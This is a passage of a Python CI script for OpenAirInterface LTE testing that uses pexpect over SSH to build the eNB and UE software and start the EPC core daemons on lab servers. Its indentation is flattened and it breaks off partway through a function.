ENB_PROCESS_FAILED = -1
ENB_PROCESS_OK = +1
ENB_PROCESS_SEG_FAULT = -11
ENB_PROCESS_ASSERTION = -12
ENB_PROCESS_REALTIME_ISSUE = -13
ENB_PROCESS_NOLOGFILE_TO_ANALYZE = -14
ENB_PROCESS_SLAVE_RRU_NOT_SYNCED = -15
HSS_PROCESS_FAILED = -2
HSS_PROCESS_OK = +2
MME_PROCESS_FAILED = -3
MME_PROCESS_OK = +3
SPGW_PROCESS_FAILED = -4
SPGW_PROCESS_OK = +4
UE_IP_ADDRESS_ISSUE = -5
OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE = -20
OAI_UE_PROCESS_COULD_NOT_SYNC = -21
OAI_UE_PROCESS_ASSERTION = -22
OAI_UE_PROCESS_FAILED = -23
OAI_UE_PROCESS_NO_TUNNEL_INTERFACE = -24
OAI_UE_PROCESS_OK = +6
UE_STATUS_DETACHED = 0
UE_STATUS_DETACHING = 1
UE_STATUS_ATTACHING = 2
UE_STATUS_ATTACHED = 3
X2_HO_REQ_STATE__IDLE = 0
X2_HO_REQ_STATE__TARGET_RECEIVES_REQ = 1
X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE = 2
X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ = 3
X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK = 10
#-----------------------------------------------------------
# Import
#-----------------------------------------------------------
import sys # arg
import re # reg
import pexpect # pexpect
import time # sleep
import os
import subprocess
import xml.etree.ElementTree as ET
import logging
import datetime
import signal
from multiprocessing import Process, Lock, SimpleQueue
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(name)s:%(levelname)s: %(message)s"
)
#-----------------------------------------------------------
# Class Declaration
#-----------------------------------------------------------
class SSHConnection():
def __init__(self):
self.prematureExit = False
self.ranRepository = ''
self.ranBranch = ''
self.ranAllowMerge = False
self.ranCommitID = ''
self.ranTargetBranch = ''
self.eNBIPAddress = ''
self.eNBUserName = ''
self.eNBPassword = ''
self.eNBSourceCodePath = ''
self.EPCIPAddress = ''
self.EPCUserName = ''
self.EPCPassword = ''
self.eNB1IPAddress = ''
self.eNB1UserName = ''
self.eNB1Password = ''
self.eNB1SourceCodePath = ''
self.eNB2IPAddress = ''
self.eNB2UserName = ''
self.eNB2Password = ''
self.eNB2SourceCodePath = ''
self.EPCSourceCodePath = ''
self.EPCType = ''
self.EPC_PcapFileName = ''
self.ADBIPAddress = ''
self.ADBUserName = ''
self.ADBPassword = ''
self.ADBCentralized = True
self.testCase_id = ''
self.testXMLfiles = []
self.nbTestXMLfiles = 0
self.desc = ''
self.Build_eNB_args = ''
self.backgroundBuild = False
self.backgroundBuildTestId = ['', '', '']
self.Initialize_eNB_args = ''
self.eNB_instance = ''
self.eNB_serverId = ''
self.eNBLogFiles = ['', '', '']
self.eNBOptions = ['', '', '']
self.eNBmbmsEnables = [False, False, False]
self.ping_args = ''
self.ping_packetloss_threshold = ''
self.iperf_args = ''
self.iperf_packetloss_threshold = ''
self.iperf_profile = ''
self.iperf_options = ''
self.nbMaxUEtoAttach = -1
self.UEDevices = []
self.UEDevicesStatus = []
self.UEDevicesRemoteServer = []
self.UEDevicesRemoteUser = []
self.UEDevicesOffCmd = []
self.UEDevicesOnCmd = []
self.UEDevicesRebootCmd = []
self.CatMDevices = []
self.UEIPAddresses = []
self.htmlFile = ''
self.htmlHeaderCreated = False
self.htmlFooterCreated = False
self.htmlUEConnected = -1
self.htmleNBFailureMsg = ''
self.htmlUEFailureMsg = ''
self.picocom_closure = False
self.idle_sleep_time = 0
self.x2_ho_options = 'network'
self.x2NbENBs = 0
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.htmlTabRefs = []
self.htmlTabNames = []
self.htmlTabIcons = []
self.repeatCounts = []
self.finalStatus = False
self.OsVersion = ''
self.KernelVersion = ''
self.UhdVersion = ''
self.UsrpBoard = ''
self.CpuNb = ''
self.CpuModel = ''
self.CpuMHz = ''
self.UEIPAddress = ''
self.UEUserName = ''
self.UEPassword = ''
self.UE_instance = ''
self.UESourceCodePath = ''
self.UELogFile = ''
self.Build_OAI_UE_args = ''
self.Initialize_OAI_UE_args = ''
self.flexranCtrlInstalled = False
self.flexranCtrlStarted = False
self.expectedNbOfConnectedUEs = 0
self.startTime = 0
def open(self, ipaddress, username, password):
count = 0
connect_status = False
while count < 4:
self.ssh = pexpect.spawn('ssh', [username + '@' + ipaddress], timeout = 5)
self.sshresponse = self.ssh.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', 'Last login', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
self.ssh.sendline('yes')
self.ssh.expect('password:')
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 1:
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 2:
# Checking if we are really on the remote client defined by its IP address
self.command('stdbuf -o0 ifconfig | egrep --color=never "inet addr:|inet "', '\$', 5)
result = re.search(str(ipaddress), str(self.ssh.before))
if result is None:
self.close()
else:
count = 10
connect_status = True
else:
# debug output
logging.debug(str(self.ssh.before))
logging.debug('self.sshresponse = ' + str(self.sshresponse))
# brief pause before retrying after a failure
if not connect_status:
time.sleep(1)
count += 1
if connect_status:
pass
else:
sys.exit('SSH Connection Failed')
def command(self, commandline, expectedline, timeout):
logging.debug(commandline)
self.ssh.timeout = timeout
self.ssh.sendline(commandline)
self.sshresponse = self.ssh.expect([expectedline, pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
return 0
elif self.sshresponse == 1:
logging.debug('\u001B[1;37;41m Unexpected EOF \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
logging.debug(str(self.ssh.before))
sys.exit(self.sshresponse)
elif self.sshresponse == 2:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
result = re.search('ping |iperf |picocom', str(commandline))
if result is None:
logging.debug(str(self.ssh.before))
sys.exit(self.sshresponse)
else:
return -1
else:
logging.debug('\u001B[1;37;41m Unexpected Others \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
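# Usage sketch (hypothetical host credentials): open a session, run one
# command waiting for the shell prompt with a 5 s timeout, then close.
#
#   ssh = SSHConnection()
#   ssh.open('192.168.1.10', 'oaici', 'secret')  # retries up to 4 times
#   ssh.command('uname -r', '\$', 5)             # returns 0 on prompt match
#   ssh.close()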
def close(self):
self.ssh.timeout = 5
self.ssh.sendline('exit')
self.sshresponse = self.ssh.expect([pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
pass
elif self.sshresponse == 1:
if not self.picocom_closure:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT during closing\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Unexpected Others during closing\u001B[0m')
def copyin(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination)
while count < 10:
scp_spawn = pexpect.spawn('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# brief pause before retrying after a failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
return 0
else:
return -1
def copyout(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination)
while count < 4:
scp_spawn = pexpect.spawn('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# brief pause before retrying after a failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
pass
else:
sys.exit('SCP failed')
def BuildeNB(self):
if self.ranRepository == '' or self.ranBranch == '' or self.ranCommitID == '':
Usage()
sys.exit('Insufficient Parameter')
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
self.command('mkdir -p ' + lSourcePath, '\$', 5)
self.command('cd ' + lSourcePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.ranRepository + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
# TODO (Raphael): add a check that git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
# Checking the BUILD INFO file
if not self.backgroundBuild:
self.command('ls *.txt', '\$', 5)
result = re.search('LAST_BUILD_INFO', str(self.ssh.before))
if result is not None:
mismatch = False
self.command('grep SRC_COMMIT LAST_BUILD_INFO.txt', '\$', 2)
result = re.search(self.ranCommitID, str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep MERGED_W_TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
result = re.search('YES', str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
result = re.search('develop', str(self.ssh.before))
else:
result = re.search(self.ranTargetBranch, str(self.ssh.before))
if result is None:
mismatch = True
else:
result = re.search('NO', str(self.ssh.before))
if result is None:
mismatch = True
if not mismatch:
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
return
self.command('echo ' + lPassWord + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.ranCommitID != '':
self.command('git checkout -f ' + self.ranCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already have been checked earlier
if (self.ranAllowMerge):
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
self.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to remove in log (git clean did the trick)
if self.backgroundBuild:
self.command('echo "./build_oai ' + self.Build_eNB_args + '" > ./my-lte-softmodem-build.sh', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-build.sh', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S -E daemon --inherit --unsafe --name=build_enb_daemon --chdir=' + lSourcePath + '/cmake_targets -o ' + lSourcePath + '/cmake_targets/compile_oai_enb.log ./my-lte-softmodem-build.sh', '\$', 5)
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
self.backgroundBuildTestId[int(self.eNB_instance)] = self.testCase_id
return
self.command('stdbuf -o0 ./build_oai ' + self.Build_eNB_args + ' 2>&1 | stdbuf -o0 tee compile_oai_enb.log', 'Bypassing the Tests|build have failed', 1500)
self.checkBuildeNB(lIpAddr, lUserName, lPassWord, lSourcePath, self.testCase_id)
def WaitBuildeNBisFinished(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
count = 40
buildOAIprocess = True
while (count > 0) and buildOAIprocess:
self.command('ps aux | grep --color=never build_ | grep -v grep', '\$', 3)
result = re.search('build_oai', str(self.ssh.before))
if result is None:
buildOAIprocess = False
else:
count -= 1
time.sleep(30)
self.checkBuildeNB(lIpAddr, lUserName, lPassWord, lSourcePath, self.backgroundBuildTestId[int(self.eNB_instance)])
def checkBuildeNB(self, lIpAddr, lUserName, lPassWord, lSourcePath, testcaseId):
self.command('cd ' + lSourcePath + '/cmake_targets', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
buildStatus = True
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
buildStatus = False
else:
# Generating a BUILD INFO file
self.command('echo "SRC_BRANCH: ' + self.ranBranch + '" > ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('echo "SRC_COMMIT: ' + self.ranCommitID + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
self.command('echo "MERGED_W_TGT_BRANCH: YES" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
self.command('echo "TGT_BRANCH: develop" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "TGT_BRANCH: ' + self.ranTargetBranch + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "MERGED_W_TGT_BRANCH: NO" >> ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('mkdir -p build_log_' + testcaseId, '\$', 5)
self.command('mv log/* ' + 'build_log_' + testcaseId, '\$', 5)
self.command('mv compile_oai_enb.log ' + 'build_log_' + testcaseId, '\$', 5)
if self.eNB_serverId != '0':
self.command('cd cmake_targets', '\$', 5)
self.command('if [ -e tmp_build' + testcaseId + '.zip ]; then rm -f tmp_build' + testcaseId + '.zip; fi', '\$', 5)
self.command('zip -r -qq tmp_build' + testcaseId + '.zip build_log_' + testcaseId, '\$', 5)
self.close()
if (os.path.isfile('./tmp_build' + testcaseId + '.zip')):
os.remove('./tmp_build' + testcaseId + '.zip')
self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/tmp_build' + testcaseId + '.zip', '.')
if (os.path.isfile('./tmp_build' + testcaseId + '.zip')):
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, './tmp_build' + testcaseId + '.zip', self.eNBSourceCodePath + '/cmake_targets/.')
os.remove('./tmp_build' + testcaseId + '.zip')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath + '/cmake_targets', '\$', 5)
self.command('unzip -qq -DD tmp_build' + testcaseId + '.zip', '\$', 5)
self.command('rm -f tmp_build' + testcaseId + '.zip', '\$', 5)
self.close()
else:
self.close()
if buildStatus:
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
else:
logging.error('\u001B[1m Building OAI eNB Failed\u001B[0m')
self.CreateHtmlTestRow(self.Build_eNB_args, 'KO', ALL_PROCESSES_OK)
self.CreateHtmlTabFooter(False)
sys.exit(1)
def BuildOAIUE(self):
if self.UEIPAddress == '' or self.ranRepository == '' or self.ranBranch == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('mkdir -p ' + self.UESourceCodePath, '\$', 5)
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.ranRepository + ' .; else stdbuf -o0 git fetch --prune; fi', '\$', 600)
# TODO: add a check that git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
self.command('ls *.txt', '\$', 5)
result = re.search('LAST_BUILD_INFO', str(self.ssh.before))
if result is not None:
mismatch = False
self.command('grep SRC_COMMIT LAST_BUILD_INFO.txt', '\$', 2)
result = re.search(self.ranCommitID, str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep MERGED_W_TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
result = re.search('YES', str(self.ssh.before))
if result is None:
mismatch = True
self.command('grep TGT_BRANCH LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
result = re.search('develop', str(self.ssh.before))
else:
result = re.search(self.ranTargetBranch, str(self.ssh.before))
if result is None:
mismatch = True
else:
result = re.search('NO', str(self.ssh.before))
if result is None:
mismatch = True
if not mismatch:
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
return
self.command('echo ' + self.UEPassword + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.ranCommitID != '':
self.command('git checkout -f ' + self.ranCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already have been checked earlier
if (self.ranAllowMerge):
if self.ranTargetBranch == '':
if (self.ranBranch != 'develop') and (self.ranBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.ranTargetBranch)
self.command('git merge --ff origin/' + self.ranTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to remove in log (git clean did the trick)
self.command('stdbuf -o0 ./build_oai ' + self.Build_OAI_UE_args + ' 2>&1 | stdbuf -o0 tee compile_oai_ue.log', 'Bypassing the Tests|build have failed', 600)
self.command('ls lte_build_oai/build', '\$', 3)
self.command('ls lte_build_oai/build', '\$', 3)
buildStatus = True
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is None:
buildStatus = False
self.command('mkdir -p build_log_' + self.testCase_id, '\$', 5)
self.command('mv log/* ' + 'build_log_' + self.testCase_id, '\$', 5)
self.command('mv compile_oai_ue.log ' + 'build_log_' + self.testCase_id, '\$', 5)
if buildStatus:
# Generating a BUILD INFO file
self.command('echo "SRC_BRANCH: ' + self.ranBranch + '" > ../LAST_BUILD_INFO.txt', '\$', 2)
self.command('echo "SRC_COMMIT: ' + self.ranCommitID + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if (self.ranAllowMerge):
self.command('echo "MERGED_W_TGT_BRANCH: YES" >> ../LAST_BUILD_INFO.txt', '\$', 2)
if self.ranTargetBranch == '':
self.command('echo "TGT_BRANCH: develop" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "TGT_BRANCH: ' + self.ranTargetBranch + '" >> ../LAST_BUILD_INFO.txt', '\$', 2)
else:
self.command('echo "MERGED_W_TGT_BRANCH: NO" >> ../LAST_BUILD_INFO.txt', '\$', 2)
self.close()
self.CreateHtmlTestRow(self.Build_OAI_UE_args, 'OK', ALL_PROCESSES_OK, 'OAI UE')
else:
self.close()
logging.error('\u001B[1m Building OAI UE Failed\u001B[0m')
self.CreateHtmlTestRow(self.Build_OAI_UE_args, 'KO', ALL_PROCESSES_OK, 'OAI UE')
self.CreateHtmlTabFooter(False)
sys.exit(1)
def InitializeHSS(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC Release 14 Cassandra-based HSS')
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
logging.debug('\u001B[1m Launching tshark on all interfaces \u001B[0m')
EPC_PcapFileName = 'epc_' + self.testCase_id + '.pcap'
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f ' + EPC_PcapFileName, '\$', 5)
self.command('echo $USER; nohup sudo tshark -f "tcp port not 22 and port not 53" -i any -w ' + self.EPCSourceCodePath + '/scripts/' + EPC_PcapFileName + ' > /tmp/tshark.log 2>&1 &', self.EPCUserName, 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S mkdir -p logs', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f hss_' + self.testCase_id + '.log logs/hss*.*', '\$', 5)
self.command('echo "oai_hss -j /usr/local/etc/oai/hss_rel14.json" > ./my-hss.sh', '\$', 5)
self.command('chmod 755 ./my-hss.sh', '\$', 5)
self.command('sudo daemon --unsafe --name=hss_daemon --chdir=' + self.EPCSourceCodePath + '/scripts -o ' + self.EPCSourceCodePath + '/scripts/hss_' + self.testCase_id + '.log ./my-hss.sh', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS')
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_hss 2>&1 | stdbuf -o0 awk \'{ print strftime("[%Y/%m/%d %H:%M:%S] ",systime()) $0 }\' | stdbuf -o0 tee -a hss_' + self.testCase_id + '.log &', 'Core state: 2 -> 3', 35)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
logging.debug('Using the ltebox simulated HSS')
self.command('if [ -d ' + self.EPCSourceCodePath + '/scripts ]; then echo ' + self.eNBPassword + ' | sudo -S rm -Rf ' + self.EPCSourceCodePath + '/scripts ; fi', '\$', 5)
self.command('mkdir -p ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('cd /opt/hss_sim0609', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f hss.log daemon.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "Starting sudo session" && sudo daemon --unsafe --name=simulated_hss --chdir=/opt/hss_sim0609 ./starthss_real ', '\$', 5)
else:
logging.error('This option should not occur!')
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeMME(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC Release 14 MME')
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f mme_' + self.testCase_id + '.log', '\$', 5)
self.command('echo "./run_mme --config-file /usr/local/etc/oai/mme.conf --set-virt-if" > ./my-mme.sh', '\$', 5)
self.command('chmod 755 ./my-mme.sh', '\$', 5)
self.command('sudo daemon --unsafe --name=mme_daemon --chdir=' + self.EPCSourceCodePath + '/scripts -o ' + self.EPCSourceCodePath + '/scripts/mme_' + self.testCase_id + '.log ./my-mme.sh', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('stdbuf -o0 hostname', '\$', 5)
result = re.search('hostname\\\\r\\\\n(?P<host_name>[a-zA-Z0-9\-\_]+)\\\\r\\\\n', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m Hostname Not Found! \u001B[0m')
sys.exit(1)
host_name = result.group('host_name')
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_mme 2>&1 | stdbuf -o0 tee -a mme_' + self.testCase_id + '.log &', 'MME app initialization complete', 100)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_mme', '\$', 5)
else:
logging.error('This option should not occur!')
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def InitializeSPGW(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.EPCType == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC Release 14 SPGW-CUPS')
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f spgwc_' + self.testCase_id + '.log spgwu_' + self.testCase_id + '.log', '\$', 5)
self.command('echo "spgwc -c /usr/local/etc/oai/spgw_c.conf" > ./my-spgwc.sh', '\$', 5)
self.command('chmod 755 ./my-spgwc.sh', '\$', 5)
self.command('sudo daemon --unsafe --name=spgwc_daemon --chdir=' + self.EPCSourceCodePath + '/scripts -o ' + self.EPCSourceCodePath + '/scripts/spgwc_' + self.testCase_id + '.log ./my-spgwc.sh', '\$', 5)
time.sleep(5)
self.command('echo "spgwu -c /usr/local/etc/oai/spgw_u.conf" > ./my-spgwu.sh', '\$', 5)
self.command('chmod 755 ./my-spgwu.sh', '\$', 5)
self.command('sudo daemon --unsafe --name=spgwu_daemon --chdir=' + self.EPCSourceCodePath + '/scripts -o ' + self.EPCSourceCodePath + '/scripts/spgwu_' + self.testCase_id + '.log ./my-spgwu.sh', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./run_spgw 2>&1 | stdbuf -o0 tee -a spgw_' + self.testCase_id + '.log &', 'Initializing SPGW-APP task interface: DONE', 30)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./start_xGw', '\$', 5)
else:
logging.error('This option should not occur!')
self.close()
self.CreateHtmlTestRow(self.EPCType, 'OK', ALL_PROCESSES_OK)
def CheckFlexranCtrlInstallation(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
return
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ls -ls /opt/flexran_rtc/*/rt_controller', '\$', 5)
result = re.search('/opt/flexran_rtc/build/rt_controller', str(self.ssh.before))
if result is not None:
self.flexranCtrlInstalled = True
logging.debug('Flexran Controller is installed')
self.close()
def InitializeFlexranCtrl(self):
if self.flexranCtrlInstalled == False:
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd /opt/flexran_rtc', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f log/*.log', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S echo "build/rt_controller -c log_config/basic_log" > ./my-flexran-ctl.sh', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 755 ./my-flexran-ctl.sh', '\$', 5)
